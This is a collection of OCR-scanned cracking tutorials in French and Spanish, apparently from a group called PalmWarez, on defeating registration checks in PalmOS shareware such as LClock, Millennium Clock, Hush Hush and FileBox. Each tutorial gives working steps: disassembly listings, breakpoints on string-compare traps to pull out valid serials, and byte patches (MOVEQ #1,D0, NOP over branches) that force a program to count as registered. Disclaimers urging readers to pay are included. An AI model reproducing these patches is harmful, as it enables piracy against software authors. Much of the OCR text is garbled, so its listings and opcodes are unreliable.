00001c64 7001 MOVEQO ++1,DO0 

00001c66 4cee00f8ffec L201 MOVEM.L -20(46),D3-D7 

00001c6c 4e3e UNLK A6 

00001c6e 4e75 RTS 


00001c70 4e560000  L202 LINK A6,+tt0 


La procédure se termine donc en 1c6e par le RTS. D'ailleurs, une autre procédure commence 
en L202... 


Nous voyons immédiatement deux instructions intéressantes : en 1c58, l'instruction CLR.W DO 
qui met DO a zéro (clr=clear=efface), et en 1c64 l'instruction MOVEQ +1,DO qui met la valeur 
1 dans DO. 


Apparement, en 1c4e se fait un test, qui en 1c50 nous améne soit en L200 qui met DO a 1 
puis saute en L201 pour quitter la routine, soit continue en effacant DO puis sautant en L201 
pour quitter. 


Deux solutions s'offrent donc a nous : soit nous modifions le saut conditionnel BEQ 200 en 
BRA 200, soit nous modifions le CLR.W DO. Disons que pour changer un peu nous allons 
choisir la deuxieme solution: changer le CLR.W DO en MOVEQ +41,DO. En 1c64 nous voyons 
que le code du MOVEQ est 7001, il suffit donc de changer en 1c58 la valeur 4240 par 7001. 


Je pense que vous connaissez maintenant cette manipulation a faire sous HexEdit. Modifiez 
donc le fichier Iclock.prce , puis chargez le dans le PalmEmulator. Tapez une clé bidon et la ho, 
joie ! le programme s'enregistre correctement... 


3eme Partie: Conclusion 


La lecon n*02 a pour but de vous faire comprendre que parfois, vous ne modifiez que le test 
d'affichage du message d'erreur, et non pas le test complet du mot de passe. Dans notre cas, 
c'est la routine L198 qui teste le mot de passe. Cette routine est appelée lors du test 
d'affichage, mais est aussi utilisée ailleurs dans le programme, notamment lors du test 
d'enregistrement. C'est pourquoi il faut effectuer la modification dans la routine elle-méme*. 


Vous vous rendez compte qu'il est extremement facile de venir a bout de clé de protection 
comme celle-ci. Beaucoup de Sharewares fonctionnent sur le méme principe. Si vous étes 
programmeur, j'espéere que vous saurez en tirer des lecons. 


Vous trouverez un exemple un peu plus difficile dans la lecon numéro 3. 

Le programme LClock fonctionne quasi-identiquement s'il est enregistré ou s'il ne l'est pas. Si 
vous voulez juste éviter de payer vos licenses, il donc inutile d'opérer la manipulation exercée 
dans cette lecon. Néanmoins, j'espere que ce cours vous restera en tant qu'information, et 


non pas pour utiliser des logiciels dans un cadre i¡llégal. Si vous utilisez LClock régulerement, 
je vous incite a payer la license afin de d'encourager son auteur a continuer son logiciel. 


Note additionelle 


* : |l est aussi possible de rechercher tous les endroits dans le programme oú est appelée la routine L198 pour 
modifier le test sur DO qui est fait apres. C'est pourquoi il est plus simple de faire la modification dans L198. 
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POSE (PalmOS Emulator) con un ROM southDebugger 1.7 


INTRODUCCION 


Crear su número de serie personal, cómo hacer uno "entrar cualquier serial para registrar" - hacer un parche 
para introducir cualquier serial y hacer otro parche que ya este "registrado" - parche solo usando un 
debugger. 


AL ATAQUE 


Parte 1: Encontremos su número de serie para nuestro blanco 


Primero, cragamos el POSE y southDebugger y carguemos nuestro blanco ("El Millenium Clock") en el emulador. Inicie nuestro blanco con el 
POSE y escojemos "Regístrar" del menú: 


Register Willennium Clock €) 
Version 2001 Patented! 


Please enter your 
registration code. 


Not Registered 
Reg Code NoRegCode] 


Register Finished 


Ju 


Algunas aplicaciones usan una llamada API para comparar el serial correcto con el serial entrado. Probaremos esto primero. Entonces, pararemos 
en estas llamadas API. Primero tenemos que hacer una suspensión normal, un método simple a hacer esto, es usar el graffiti-debug-shortcut: Use a 
su ratón introducir 


En el POSE Emulator. Usted tiene que sacar los primeros tres símbolos en el sitio izquierdo y el último carácter ("1") en el sitio correcto del 
grafitti-field. Ahora, southDebugger se detuvo y está esperando a su entrada. Abra breakpoint-window nuevo 


breakpoints 


Haga clic en los botones "” seleccione los botones "sysTrapStrCompare" y "sysTrapStrCaselessCompare": 


breakpoints 


Ahora presione a FS ("VAMOS") al southDebugger para continuar. Introduzca a "XXX" como serial falso en nuestro blanco y dé un clic sobre 
"Registro". El southDebugger intentara poner un break otra vez. Abra una la ventana de desensamblador: 


disassembler [PC] 


decmex y ] DO1B8A18 


ii hex 


3600 DO, D3 
4FEFOO14 $20!$14(47), A? 


6710 $16!$10 ¿CheckValidCode+00000048=001B8A434 
486DFF12 $-2381$-EE (AS) 

486DFDFC $-516!$-204 (45) 

4E4FAOCA $15!7F, f41162!/fA0CA [sysTrapStrCaselessCompare] 


ño [ a  [ a2 [ as J[ mam [ as  [ a6  J[  a7 [MA 
po [1  [  D2 p3  [ Ds [05 | D6 D7 USP 


[001B89EC-001B8ACC]: CheckValidCode 


Claro, hay realmente un sysTrapStrCaselessCompare. Ahora necesitamos saber,cuales son los strings comparados. Así es que abra una "trap-stack 
window" nueva ventana en southDebugger: 


¡Esto luce bien! Escriba a abajo de "52779X2932" se checa, si es realmente nuestro serial. Remueva los breaks en API y presione a FS otra vez. 
¡Nuestro traget dirá "código inválido", y ahora no introducimos "XXX", dejamos probar "52779X2932" ... y ... sí, trabaja ! ahora la aplicación 
está registrada! Éste fue la parte 1 de este tutorial. 


Parte 2: parche para registrar con cualquier serial 


En la primera parte obtuvimos nuestro serial personal, pero tal vez no queremos recordarlo , justamente queremos una aplicación parchada, lo 
cual aceptarará cualquier serial y lo valide. 


Tenemos que volver a arrancar POSE y southDebugger, porque necesitamos una versión sin registrar limpia de nuestro blanco. Vuelva a cargar 
nuestro blanco en el POSE, abra a "Register” pantalla, Use Break, Inicie poniendo breakpoints en las API, continúe, introduzca a "XXX" 
falso y espere a que el POSE se detenga en los breakpoints que compara con las llamadas de las APIS. 


—] disassembler E 


3600 MOVE. 1 DO, D3 

4FEFOO14 LEA $20!1$14(47), A7? 

6710 BEQ $16!710 ¿CheckValidCode+00000048=001E836C 
486DFF12 PEA $-238!1$-EE (AS) 

486DFDFC PEA $-516!$-204 (45) 

4E4FAOCA TRAP $l15!$F, $41162!/$A40CA [sysTrapStrCaselessCompare] 
3600 MOVE. DO, D3 

504F ADDO $38, A? 

4143 TST.W D3 

6636 BNE $54!7$36 ¿CheckValidCode+00000082=001ES8346 
1B?COOO1FDAF  MOVE.B $$l, f-S593!7-251(A5) 


DUO E ES TA E PE E E E | | 6 | a7 ¡MACS 
po om [om om om ([ os | _o6— [oz | usp |] 


[001E8324-001E8404]: CheckValidCode 


Si queremos que la aplicación aceptar todos los seriales, entonces tenemos que reemplazar una llamada a la API con un MOV 0, DO. Ahora 
haga un clic derecho en la línea marcada y escoja "cambiar memoria contenida” del menú contextual. El opcode para MOV 0, DO es 7000, pero 
tenemos que reemplazar 4 bytes (4E4FAOCA), así es que tenemos que cambiar por un NOP (4E71, "Ninguna operación”), también. Así es que, 
entre en 70004E71 y usted verá los cambios de inmediato en su ventana de desensamblador. Remueva los demas breakpoints y presione a ES. 
Usted verá, aho0ra "XXX" y será aceptado, también. Ahora usted puede hacer estos cambios de bytes en su archivo original con un hexeditor 
hexadecimal y usted tiene una agradable aplicación parchada, Con lo cual aceptarará todos los seriales . southDebugger es capaz de hacer 
cambios los bytes en su archivo original, también, usted lo aprenderá en la siguiente parte. 


Parte 3: Haciendo un parche "ya registrado" 


Otra vez, necesitamos una instalación limpia, así es que volvamos a arrancar POSE y southDebugger y carguemos nuestro blanco en el POSE. 
Después de eso, Ponemos un Break en el POSE grafitti shortcut Ahora abra una ventana del analizador - file-analyzer window in 
southDebugger, seleccionamos "abrir archivo" y seleccione nuestro archivo de blanco. Ahora usted debería ver algo así como: 


file-analyzer 
open file... [ECIk2001.pre relocate 


_J apply all memory changes to this file create backup file 


Q KHEacik2001 pre a214l address | ascii command 
0 (E code0001 Poolbss6s NV.. 4E560000 LINK AG, $0 


Q Startup 2F03 MOVE.L  D3, -(A7) 
== q , -- 486DFEOS PEA f-504 (45) 

1) <untitled> -. 486DFD8SA PEA $-630(45) 
Q mal .. 4E4FAOCA TRAP $15, f$41162 [sysTrapStrCaselessConmpare] 
Ly Romversioncompatible E - 3600 MOVE. DO, D3 

¿Jo01B3897C 504F ADDO.W $8, A7? 
Q Calculatecode z . , 

AJO01BS97E f. 6608 BNE $8 ¡RegistrationCheck+00000020=001B8988 
O cetUuservame ¿Joo1B8980 .|... IB7COOOLFDAF MOVE.B fl, $-593(A5) 
Q RegistrationCheck E 001B38986 ”. 6018 BPA $24 ¡RegistrationCheck+00000038=001B... 
IN CheckWalidCode z 001BS988 -- AS6GDFEOS PEA $-504 (45) 
N SecBlock z 001B898C Hm.. 486DFF12 PEA $-238(A5) 

¿JO01BS3990 2. 4E4FAOCA TRAP $15, f$41162 [sysTrapStrCaselessConmpare] 
Ly MinBlock ¿J001B8994 6. 3600 MOVE. DO, D3 
kh UpdateHours z 001B8996 504F ADDO.W $3, A? 
: 2% Joolbs998 £. 6606 BNE $6 ¡RegistrationCheck+00000038=001B89A0 


RegistrationCheck: 00188968-001B89D8 7] 


En el sitio izquierdo, usted puede ver el archivo seleccionado (nuestro blanco): CIk2001.pre con sus segementos de código. este solo hace UN 
único codigo de segmento: El code0001. Algunas aplicaciones tienen todavía informaciones depuradas como los nombres de rutina en el 
código, así es que es siempre un intento para mirar estos nombres, si hay algo interesando. Y sí, "RegistrationCheck" mira si esta realmente 
interesando 


Esta vez, queremos southDebugger para ejercer todos los cambios de memoria para nuestro archivo. Así es que haga clic adelante "crea" archivo 
de respaldo, así es que todavía tenemos un archivo no parchado. Será llamado "CIk2001 .prc.original”. Ahora el cheque "ejerce todos los cambios 
de memoria para este archivo". 


En parte 2 de este manual de instrucción, cambiamos a un API Call (Se asemeja), así es que trataremos de nuevo esto. Rightclick sin retardo con 
el sysTrapStrCaselessCompare, escoge "contenido de memoria de cambio" e introduce a "70004E71" otra vez. La prensa FS a continuar. Ahora 
usted puede iniciar nuestro blanco en el POSE, puede escoger a "Register" y a usted verá: La aplicación está ya registrada. Ahora usted tiene 


una versión parchada del archivo en su paseo en coche y la puede enviar a tra palm sin usar cualquier otro software: Sólo POSE y un debugger. 


Por favor note, que no todos los programas pueden ser parchados así de fácil, no todos los programas usan sysTrapStrCaselessCompare. 
Justamente juegue con el blanco. Pruebe varias cosas y usted tendrá más éxito. 


Usted debería crear tales parches sólo para su uso personal, si usted quiere probar tal software sin limitaciones. Si usted está feliz con el 
software: ¡DEBERA COMPRAR! 


PalmWarez, 2004/12/25 Traducción del Ingles 
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Conseguir un parche y password valido. 


INTRODUCCION 


Este programa mostrará el poder de . Con la ayuda de PRCedit, usted puede parchar este programa en 
menos que 5 minutos.. 


AL ATAQUE 
Haga un download del programa, descomprimelo y pónlo a funcionar en el POSE. Al intentar registrarlo aparece esta pantalla: 


Si tu entras incorrectamente un serial, entonces usted pondrá este alerta de mal chico: 


Abre el programa PRCedit y mira en el árbol de objetos puedras encontrar el mensaje del mal chico. 


Prcedit - [F ¡Palm Programstopatch' HushYer10Hush-BW.bin.s] 
Brie Edie view Tools window Help 


E Resowoes 

3 Forms 
23 Alerts 

+ 1000 Delete This Passwerd ? 

1001 System Version 3.3 01 greates is required to 1un this application. 
1100 The Entry you are now Editing doesn't have any details mit you cannot alta: 
1101 Could Not Export to Mero 
1200 61€ you sure you veant to delete Ihe note 7 
1201 Import Failed - Could not find a memo with Hush Hush data format do il 
1300 41e you sure pou want to change your password key to Hush Hush 2 
1301 Import Failed - The memo to import is comupted 
1400 41e you sure wan to Delete all Passwards in Ihis category ? 
1401 Import Completed 
1500 You are currently wewmng Ue 
1501 Import was not Completed 
1600 Somehow, pour database contains loo mary entes lor an urregstered sofhe 
1601 Export Completed 
1700 For Some Reason, yow Data Base is not enciypled and here for needs aN 
1200 Please Re-Enter the Password Key for confirmation. 
1900 OK 
2000 Welcome to Hush Hush. InPlease choose yoursell a mew password key anc 
2100 The second Pass Key doesnt match lhe first Pass Key inNew Password Kes 
2200 password List 
2300 This Action can only be performed from the 
2400 The Registration key Entered is Not Correct for pour Hotsync name, please tr 
TJ References 

ml 00002530 
+ 2500 Thanks For Registering this shareware, please keep your registration key (po 
+ 2700 The application is not registered. You cannot add any more Entries to an unn 
+ 2800 The application is not regitered, and has been instaled on this device fos mos 
+ 2900 Weno: This application is not registered. please registes so that you well no 


le 
DAALALAILAIAIAIAIAIAIAIIAICIAIAIIICSIO»» 


7) Search Results 


») 


Ah, allí usted lo tiene. la misma referencia y la flecha verde nos dice que aquella nag-screen es llamada allí. Double click en la flecha 
verde y PRCedit le llevará al código: 


3394 000024e6 
3305 000024e8 
3385 000024ec 
3307 000024ec 
3368 000024ee 
3309 00002412 
3318 00002414 
3311 000024£8 
3312 000024tc 
3313 000024fc 
3314 00002500 
3216 00002504 
3316 00002508 
8317 00002 50a 
3318 0000250e 
3319 00002510 
3328 00002514 
3321 00002518 
3322 00002518 
3323 0000251c 
3324 00002520 
3225 00002524 
3326 00002528 
38327 0000252c 
3328 0000252c 
3323 00002 52e 

mhazza 
3331 00002534 
3332 00002538 
3333 00002538 
33324 0000253a 


210b 
4e4fal39 


24943 
3£3c0008 
210a 
486d£d20 
4e4fa2ce 


422df£d28 
45641ad20 
úebaflda 
4400 

24ref0014 
6720 

313CDICA 
4e4fal92 


422dfd11 
422df£d12 
422drd13 
31£3c0998 
40e141a19b 


584f£ 
600a 


4e41a192 


594f 


72601 L266 


MOVE .L 
TRAP 
DC. UV 
MOVEA.L 
MOVE . U 
MOVE .L 
PEA 
TRAP 
DC.U 
CLR.B 
PEA 
JSR 
T3T.B 
LEA 
BEQ 
MOVE. Y 
TRAP 
DC.U 
CLR.B 
CLR.B 
CLR.B 
MOVE. U 
TRAP 
DC.U 
ADDO. U 
BRA 


TRAP 
DC.U 
ADDO. U 
MOVEO 


A3,-(A7) 

ñi5 
sysTrapFldGetTextPtr 
A0,A2 

$0,- (47) 
A2,-(A7) 
-736(A5) 

$15 
sysTrapStrHKCopy 
-728(A5) 
-736(15) 

L160 ; *Regóxi" 
DO 

20147), ,A7 

L265 
$2500'$9c4,-(47) 
$15 
sysTrapFimálert 
-751(A5) 
”7S50(AS) 

-749 (15) 
$2200:$898,-(A7) +; 
H15 
sysTrapFrmcotoForm 
$4,A7 

L266 


* Thanks For Registering this sha 


Rgistration 


$15 
sysTrapFrmilert 
42,47 

Ñ1,D3 


De acuerdo, el código poco antes del el mal chico se ve bonito.. Conducimos a un JSR hasta ' RegOkl1 ' ' (el comentario insertado por 
PRCedit del buen tipo, conducimos una llamada hasta un mensaje buen tipo; Gracias por Registrar a este shareware, por favor déjese 
su serial de registro ' (Otra vez, PRCedit insertó este comentario) y conducimos la llamada hasta nuestro mensaje del mal chico. 


Se puede ver cuál es en la función RegOk1. Seleccionamos L160 y damos un click derecho ' y Salta al link L160 '. El PRCedit ahora 
le llevará a esta función. Haga una lectura ligera hacia abajo para ver si podemos hacer seguro la función siempre retorna 1. Aquí 


usted tiene el código: 


00001894 
00001898 
0000189c 
0000189%c 
0000189%e 
000018a2 
000018a4 
000018a6 
000018a8 
000018ac 
000018ae 
000018b0 
000018b1 


2f2e0008 
4de4fa2ed 


4a40 
4fef0014 
6602 

7801 

1004 
4cdf0c18 
de5e 

de75 

86 
5265674f6b31 


1173 
L1”74 


MOVE.L 8(A6),-(A7) 

TRAP $415 

DC.W sysTrapStrNCompare 
TST.W DO 

LEA 20(A7),A7 

BNE L173 

MOVEO $1,D4 

MOVE.B  D4,DO 

MOVEM.L (A7) ,D3/D4/A2/A3 
UNLK A6 

RTS 

DC.B $134 

DC.B '"Regokl1' 


Cambie el BEQ L161 por NOP (4e71) para asegurarse que llega al BRA 174 y cámbiele el MOVE + 0, DOen MOVE +* 1, DO (7001) 
para hacer seguro el retorno de esta función 1 


Hacer click con el boton derecho en el BEQ L161 y escoge 'Saltar a dirección (Jump to address)' 


2125 00001768 4e1fa239 TRAP $15 


2126 00001762 DC.Uu sysTrapDlkGetSyncInto 
2127 0000176e 3600 MOVE.Y  DO,D3 

2128 00001770 41e10015 LEA 291A7),A7 

2129 00001774 6706 Eo ES 

2139 00001776 7000 ” 

2131 00001778 6000012e $. Ampto fi L161 (0000177C) 
2132 00001770 4B6efíce L161 pre mRHRTSto; Soobavaible> 
2133 00001780 4e41a0c7 T. Search UD for: BEQ 

2124 00001784 D' Search Down for: BEQ 

2135 00001784 0c400008 a 

2136 00001788 s84tf ac Loadtext 

2137 000017094 6cza p Savetex 

2139 00001780 a4S6ettco py  Savetextas 

2139 00001790 4tedfaDc? T Set jump destination 

2140 00001794 D' cáculere juro From here 

2141 00001794 3600 Movr= ; 

AA MUA A MINA cana PT da a” 


Sépase que PRCedit le trae al lugar correcto en el editor hexadecimal. Cambie los bytes y guarde el programa. Cárguelo en su palm y 
usted verá que está registrado. :-) 


Bi rie Edr Irsert view Tools Window Help 
Hush:Bw.patched prc | Hush8W.:cp | Hush8W.bins | GCR 1] LCR 1 | Changes log | 


(JOx1B50: 486 6.01..g8.p.' ...Hn 
0x1B70: FFCC 4E4F A0C7 0C40 0008 584F 602A 486E yY1INO ('.8..XOl*Hn 
0x1B30: FFCC 4E4F A0C7 3600 584F 600E 7041 DOO3 yINO C6.XO' .pAD. 
Ox1B30: 41EE FFCC 1180 3000 5243 0043 0008 6DEC — AiYT.I0.RC.C..mi 
Ox1BA0: 41EE FFCC 4230 3000 7600 6014 7007 9043 AiylB00.v.' .p.IC 
Ox1B30: 41EE FFCC 43EE FFC2 13B0 0000 3000 5243 Aiyiciyá.*..0.RC 
Ox1BC0: 0043 0008 6DE6 41EE FFC2 4230 3000 486D  .C..meAiyvABOO.Hm 
0x1B30: FFAO 486E FFC2 4EBA FA7A 4878 0008 486E y HnyÁN2úzHx..Hn 
Ox1B20: FFCC 486E FFBA 4E4F A026 7600 4FEF 0014 YIHny2N0 Ew.Oi.. 
Ox1B70: 6016 486D FFAO 486E FFB2 486E FFBA 4EBA ” .Hmy Hny*Hny2N2 
Ox1CJ0: FS1E 5243 4FEF 000€ 0C43 0008 6DE4 4878 m.RCOi...C..máHx 


¿Vea? ¿No Tomó menos de 5 minutos?. Un montón de programas se pueden parchar por este camino. Pruébelo por usted mismo. 


¿Está seguro que usted que usted quiere almacenar sus contraseñas en una aplicación que se parchó en 5 minutos? No hago:-) 
Palmwarez 25-06-2004 Traducción del Ingles. 
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Palm Spanish Tuto 


PROTECCION: NAME / SERIAL 


SouthDebugger, PRCedit, PilotDis. POSE Palm emulator 


INTRODUCCION 


Este manual le enseñará a convertir las instrucciones del 68k a un opcode. Algunas veces, cuando usted 
parcha una aplicación, usted necesita reemplazar una instrucción existente pero no sabe su opcode. 


AL ATAQUE 


Echemos un vistazo al Time Calc 1.02 tutorial acerca de ' Código Reusable ' de loco Crak3R. Para procesar el parche, 
necesitamos reemplazar la instrucción: 


PEA L79 (opcode 487A000E) con MOVE.B +57,-(A7) (opcode ???) 
Para sacar en claro lo que es el opcode para MOVE.B ++ 57, - (A7), podríamos investigar el código entero para 
encontrar la misma instrucción en alguna parte, o nosotros mismos crear el opcode con un ensamblador sencillo de 


68k. Eso es lo que haré aquí. 


Usted podría encontrar aquí mucho ensamblador de 68k para plataformas diferentes. Usaré en este asó8kdos.zip de 
ejemplo que trabaja muy bien en mi estación W2k (Windows 2000). 


Después de descomprimir el archivo en alguna parte, tome un cmd y revise un simple archivo, suponemos algo de 
opcode.asm: 


CA WINNT System321cmd.exe 


En la edición de Windows 2005, SIEMPRE comienzan con un TAB (carácter de tabulación), e inserta la instrucción 
que queremos convertir en opcode: 


Fichier Edition Recherche Affichage Options 
E:NAs68ksopcode .asm 
MOVE.B 457,-<A7?> 


Guarde el archivo y ensámblelo: 


SCA WINNT System321cmd.exe 


E:NAs68k>edit opcode.asm 
E:NAs68k>as68k opcode.asm 


El resultado es en seguida exhibido: 


¡WINNT System32!cmd.exe 


E:NAs68k>edit opcode.asm 


E:NAs68:7as568k opcude.asm 
600900070 1f3c BB39 MOUE.B 1157%,-<A7> 
=>" Sumbol table ---—— 
Value Type 


Y conocemos que el opcode de esa instrucción es 1F3C0039. ¡Goce! By Flex 


Miembro de Palmwarez Group Manual creado 08 de agosto del 2002 
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PROTECCION: NAME / SERIAL 


Palm CRACKER: X-Grimator wW/31/12/2004 


INTRODUCCION 


Hola amiguitos, mala gente, infractores de la ley y en general toda esa entrañable ralea de personas que 
crackeando amplían sus conocimientos y así se van haciendo más libres...Hoy os he reunido aquí a todos, 
al calor del fuego y oyendo la lluvia que cae por la ventana mientras el viento azota la noche para contaros 
un pequeño cuento de terror que os estremecerá. Para vosotros, lo que nadie oyó nunca, lo que los 
ancianos del lugar callan atemorizados, lo que pocos saben y menos cuentan... Esta es ni más ni menos 
que (Broummmm, trueno)... 


La fabulosa e increíble historia de un crackeo pequeñito 
O de cómo enfrentarse a Filebox 3.0 para PalmOs 


Pues bien. Ahora que ya he conseguido captar vuestra atención (je je) vamos a meternos en harina y a 
comenzar este divertido berenjenal. 


AL ATAQUE 


1- INTRODUCCIÓN: 


Como a nadie se le escapa, los dispositivos de mano (llamados PDAs y verdaderos ordenadores chiquirritajos) 
disponen de varios sistemas operativos al uso, siendo los más importantes EPOC, WindowsCE y PalmOs. 
Estupendo. Hace poco X-Grimator (servidor de ustedes) tuvo una noticia muy buena en su vida y decidió regalarse a 
sí mismo una agenda electrónica de estas con PalmOs como sistema operativo (en mi caso una Handspring Visor 
Deluxe que supuso todos mis ahorros, pero en fin...) y después de instalar unos programas freeware, que al final son 
los mejores, se topó de narices con uno que le interesaba pero que era shareware. Ni corto ni perezoso y haciendo 
uso de la natural inteligencia de los crackers, X-Grimator decidió aprenderlo todo sobre PalmOs y lanzarse así a la 
aventura de ir destripando cosas ajenas... 


2- OBJETIVO: 


En este mundo diminuto de las Palm, el programita que me interesaba era Filebox 3.0, que según Softonic es: 
"Utiliza tu Palm para transportar cualquier tipo de archivo. FileBox es una aplicación que convertirá a tu Palm en un 
disquete para transportar cualquier tipo de archivo. Gracias a su Interface funcionable bajo Windows, podrás 
seleccionar el archivo deseado para enviarlo en la próxima sincronización a tu Palm. Una vez realizado esto, desde 
tu dispositivo podrás visualizar ese archivo y indicarle que en la siguiente Sincronización lo envíe al PC. Como los 
límites de memoria son escasos en los PDAs, este software te permite activar un sistema de compresión 
verdaderamente útil. Ahora podrás transportar cualquier tipo de información en tu Palm." 

-y que archiva en Comunicaciones e Infrared/Windows. Por lo tanto, siguiendo los cánones más clásicos de los tutos 
de Ingeniería Inversa, habremos de poner algo así: 

OBJETIVO: Filebox 3.0 for PalmOs 

- PROTECCIÓN: Serial 


3- HERRAMIENTAS: 


Bueno, X-Grimator se volvió medio loco buscando las herramientas necesarias para estos menesteres y perdió horas 
y horas de sueño de su vida buscando en la web páginas inexistentes sobre crackeo de Palm. Al final sólo encontré 
una de Látigo, argentino, y otra de Quequero, italiano. Un saludo muy grande a ambos por su ayuda y por ser los 
únicos interesados en este tema. 

En fin ¿a qué viene todo esto? pues viene a que en primer lugar X-Grimator es un tío que habla por los codos (vale, 
vale, me di cuenta) y en segundo lugar a que he decidido meteros con este tutorial las herramientas necesarias pues 
no es fácil encontrarlas. Por lo tanto ahí os van: 


-Prc2bin: un programita para convertir los ejecutables de PalmOs (.prc) en .bin. 
- PilotDis: un desensamblador más actualizado que PilDis (este último da problemas) 


4- ¡¡ EN GUARDIA!!: 


Siguiendo la línea clásica, instalamos el programita en nuestra Palm (para los que aún planeáis comprar una, 
también podéis usar el emulador gratuito que hay en www.palmos.com y que se llama Pilot y tras ejecutarlo vemos 
que en el menú aparece la opción de "Registration".Para los novatos, el menú lo obtienes pulsando el icono del 
papelito que aparece sobreimpreso en la pantalla de la Palm o del Emulador, abajo a la izquierda. De nada.Bárbaro. 
Nos aparece una ventanita preciosa que nos dice que hay que escribir un número para registrarse, y el número 
aparece dividido en dos campos de cuatro dígitos cada campo... ummmm, ya tenemos una pista...Pues vale, vamos 
a meter un numero cualquiera, a ver que pasa: 5223-6651 

Generalmente yo meto mi numero de DNI, pues es un número fácil de ver al debugear y que no produce confusión 
con otras cadenas de número (obviamente, el del ejemplo no es el mío). Es un truquito que os recomiendo. Le 
damos a OK... y nos aparece una ventana con un mensaje odioso de error. Típico. Eso es muy positivo, ya sabemos 
tres cosas: 

- el serial es de 8 dígitos. 


- hay un mensaje de error. 
- todo apunta a que hay otro mensaje de enhorabuena, o thank you o esas cosas 
que les encantan a los zombi-programadores yanquis... 


5- DEFENSA EN CUARTA Y MARCHANDO HACIA EL ENEMIGO: 


Vale, todo esto es muy bonito pero ¿qué coño hago?. Pues parece ser que lo que más nos interesa ahora es ver ese 
filebox.prc que hemos instalado en la maquinita. No estaría nada mal abrirle los intestinos y ver que tiene dentro 
¿no?. Para ello usaremos nuestro mejor sable: 

Prc2bin. Su uso es fácil. Metemos el filebox.prc en el mismo directorio que Prc2bin y abriendo una consola DOS nos 
dirigimos a ese directorio y tecleamos prc2bin filebox.pre con esto logramos que el directorio se nos llene de archivos 
con extensión .bin... fijaos el dichoso mini-programa lo que tenía dentro, el muy condenado... pero al menos 
ganamos ya nuestro primer asalto ¡touché!. Muy bien chavalotes, lo estáis haciendo bárbaro. 

El problema que se nos plantea ahora es elegir algo de todo eso que nos sea de utilidad. 

Para ello recurriremos a nuestro amado Zen-Cracking (¡loor a +Orc!). 

Estiro las piernas, manteniendo siempre la defensa, y apunto con mi florete al corazón de mi contrario. Veamos, lo 
más obvio en esta lucha es un mensajito de "error, tonto del capirote, que no sabes ni meter un número sin nuestra 
ayuda". Pues busquemos ese mensaje en el destripe que le hicimos al filebox a ver que aparece. NOTA: en Palm, 
los mensajes de aviso y error se llaman Taltxxxx de modo que al haber separado los componentes de filebox.prc, 
tendremos varios Taltxxxx.bin. Uno de ellos nos interesa. 

Así las cosas, los miramos con el block de notas y encontramos que Talt076c.bin nos suelta el mensaje de "wrong 
registration code” y cual será nuestra sorpresa al ver que Talt0154.bin nos dice que "Thank you...bla bla bla". Juas 
juas, vamos por buen camino, ¡hoy nuestro florete está bien afilado!. 

Acabado el primer asalto, señores. A nuestro favor, que el serial es de 8 dígitos en dos campos y que los mensajes 
de error y éxito son Talt076c y Talt0154. A favor de los zombiprogramadores, nada.Me chifla ser cruel. 


5- SEGUNDO ASALTO: MARCHAR, FONDO Y TOCADO: 


Ahora viene lo más divertido para los programadores e informáticos que me leéis, y lo más duro para X-Grimator que 
es un pobre tirador de esgrima que fue por Humanidades. Me refiero al código puro y duro. Necesitamos un código 
en listado muerto para acabar el estudio forense del tema ¿verdad?. Pues eso lo conseguiremos con la maravilla de 
desensamblador llamado PilotDis. De nuevo, vamos a una consola de DOS y entramos en el directorio de PilotDis, 
donde previamente habremos metido el archivo llamado Code0001.bin. Ese es el meollo de la cuestión porque para 
eso hemos separado los mensajitos de otras vainas. Ese es el código puro y duro, el gran enemigo, el malo y feo de 
la película. Pues tecleamos 

PilotDis code0001 .bin y el malo de la película se convierte en code0001.bin.s en el mismo directorio de PilotDis. Ya 
veis, con lo fuertote y gordo que parecía y se nos quedó en nada. En fin, la vida es que es muy mala. Nuestro 
aguerrido enemigo, ese diminuto programa en el diminuto mundo de Palm está ya sin arma. De una rápida estocada 
se la hemos tirado al suelo e indefenso tiembla viendo acercarse su suerte. Huelo ya la sangre... 


6- PRIMERA SANGRE Y FIN DEL ACTO. MUERTE MIRANDO AL SOL: 


Abrir code0001.bin.s con el block de notas no tiene ninguna complicación. Una vez dentro usamos el comando 
"buscar" del block de notas y le ponemos $076c <---------- que hace referencia a Talt076.bin y hago una pequeña 
pausa para explicaros esto, aunque reconozco que de ensamblador no tengo pero es que ni idea, o sea que tened 
paciencia conmigo. Parece ser que la historia es que aparece el símbolo de dólar ($) cuando se mete en la pila un 
mensaje de alerta. Se metería justo cuando está comenzando la ID de Alerta. Bueno, eso me dijeron, al menos para 
el ASM de PalmOs que se basa en Motorola, que como sabéis tiene sus diferencias con x86. Pero eso no viene al 
caso. Buscáis eso en el block de notas para ver cuando el mensajito de error se mete en la pila y nos encontramos 
con este pedazo de código: 


00001f6e 2800 L185 MOVE.L DO,D4 

00001f70 0c8300001b6d CMPI.L +7021!$1b6d,D3 
00001f76 661a BNE L186 

00001f78 0c8400000cfd CMPI.L +3325!$cfd,D4 
00001f7e 6612 BNE L186 

00001180 3f3c0514 MOVE.W +1300!$514,-(A7) 
00001184 4e4fa192 sysTrapFrmAlert 

00001f88 1b7c0001fe82 MOVE.B +f1,-382(A5) 
00001f8e 544f ADDQ.W +2,A7 

00001f90 600a BRA L187 

00001f92 3f3c076c L186 MOVE.W +t1900!$76c,-(A7) 
00001f96 4e4fa192 sysTrapFrmAlert 


Os he resaltado en negrita lo que os señala el buscador del block de notas. Aunque aún tenéis otra referencia más, 
esta es la que nos interesa por la sencilla razón de que justo debajo nos aparece sysTrapFrmAlert que es la API 
que muestra los mensajes de alerta. Si a eso le sumamos que el registro A7 es la pila...¡¡tocado en el corazón y 
herido de muerte!!. Nuestro enemigo agoniza. Tose sangre. Vemos claro que en 


00001192 3f3c076c L186 MOVE.W ¿+1900!$76c,-(A7) 


una 1D de alerta se está metiendo en la pila, y que es una instrucción de move que decrementa A7. Vaya, vaya, y 
además tenemos 


00001180 3f3c0514 MOVE.W ++1300!$514,-(A7) 


Si mi memoria no me falla, y no lo hace, ese $514 era el Talt514 del mesajito de "Thank you". Muchacho, has sido un 
caballero peleando, pero ahora llega tu fin. Repasemos de nuevo esto: 


00001f6e 2800 L185 MOVE.L DO,D4 

00001f70 0c8300001b6d CMPI.L 47021 !$1b6d,D3 
00001f76 661a BNE L186 

00001f78 0c8400000cftd CMPI.L ++3325!$cfd,D4 
00001f7e 6612 BNE L186 

00001180 3f3Cc0514 MOVE.W +1300!$514,-(A7) 
00001184 4e4fa192 sysTrapFrmAlert 

00001f88 1b7c0001fe82 MOVE.B +1,-382(A5) 
00001f8e 544f ADDQ.W 42,A7 

00001f90 600a BRA L187 

00001192 3f3c076c L186 MOVE.W +119001$76c,-(A7) 
